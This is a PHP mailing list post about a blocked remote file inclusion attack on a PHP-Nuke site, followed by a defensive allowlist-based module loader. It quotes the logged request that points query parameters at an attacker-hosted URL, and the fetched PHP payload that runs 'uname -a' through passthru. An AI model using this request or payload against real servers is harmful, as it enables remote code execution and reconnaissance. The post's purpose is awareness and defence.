This is of questionable relevance, but I'm sure it can serve to heighten awareness of vulnerabilities for those PHP'ers with similar scripts that involve loading files based upon query string info.
We have installed Admin Secure over our PHP-Nuke CMS, and Admin Secure recently sent us an email of a thwarted hacking attempt:

--------------------------------------------------------
Admin Secure detecting invalid file inclusion passed to index.php or modules.php files. This could be possible cross-site scripting (XSS) hack attempt to your site. For security reason, this attempt has been blocked by Admin Secure to protect your website.

Admin Secure has been collecting the following information:

- Date: 26 September 2004, 01:05
- IP Address: 193.150.170.160
- User-agent: curl/7.9.5 (i586-pc-linux-gnu) libcurl 7.9.5 (ipv6 enabled)
- Request: /modules.php?name=http://193.150.170.160/4do4sjr?&sa=http://193.150.170.160/4do4sjr?&year=http://193.150.170.160/4do4sjr?&month=http://193.150.170.160/4do4sjr?&month_l=http://193.150.170.160/4do4sjr?
- Variable: $name = http://193.150.170.160/4do4sjr?

Whois Information.....
-------------------------------------------------------

The link he was trying to get our scripts to load, http://193.150.170.160/4do4sjr? , displays this:

    <?php
    echo "\nbl3";
    echo "bl3 ";
    passthru("uname -a 2>&1");
    ?>

Which would, from what I've read about the uname command, give him info about our web server, and from there he would have an idea of which vulnerabilities to exploit.

----------------------------------------------------

What would you guys do with the attack information (IP, WHOIS)? Send a detailed email to the addresses listed in the WHOIS records?

I'm not sweating it, just curious.

Thank you,
~Jason

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
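The request above works only when a script builds an include path straight from the `name` query parameter, so that `include` fetches an attacker-hosted URL. Below is an added example of the defensive pattern, written for this post and not taken from PHP-Nuke or Admin Secure; the module directory layout and the module names in the allowlist are assumptions. Setting `allow_url_include=Off` in php.ini (PHP 5.2 and later) stops `include` from fetching `http://` URLs at all, but an exact-match allowlist also keeps out local path tricks such as `../`.

```php
<?php
// Added example (not from the original post, PHP-Nuke or Admin Secure):
// a module loader that includes only files from a fixed allowlist.
// Assumes modules live in ./modules/<name>/index.php; the names are made up.

declare(strict_types=1);

const MODULE_DIR      = __DIR__ . '/modules';
const ALLOWED_MODULES = ['News', 'Search', 'Forums'];   // constructed allowlist

// Vulnerable pattern this replaces: the request in the post hits exactly this.
//     include($_GET['name'] . '/index.php');

/**
 * Return the absolute path of the module file to include, or null if the
 * request must be rejected. The path is never built from raw user input.
 */
function resolve_module(string $name): ?string
{
    // 1. Exact-match allowlist: "http://...", "../", null bytes etc. all fail here.
    if (!in_array($name, ALLOWED_MODULES, true)) {
        return null;
    }
    // 2. Belt and braces: the resolved file must exist and stay inside MODULE_DIR.
    $base = realpath(MODULE_DIR);
    $path = realpath(MODULE_DIR . '/' . $name . '/index.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$name = $_GET['name'] ?? '';
$path = resolve_module($name);

if ($path === null) {
    // Record the attempt the way Admin Secure's notice does, then refuse.
    error_log(sprintf('blocked module include: name=%s ip=%s ua=%s',
        $name,
        $_SERVER['REMOTE_ADDR'] ?? '-',
        $_SERVER['HTTP_USER_AGENT'] ?? '-'));
    http_response_code(400);
    exit('Invalid module');
}

include $path;
```

Because the allowlist comparison is strict and exact, the logged `name=http://...` value from the notice above is rejected before any filesystem or network access happens.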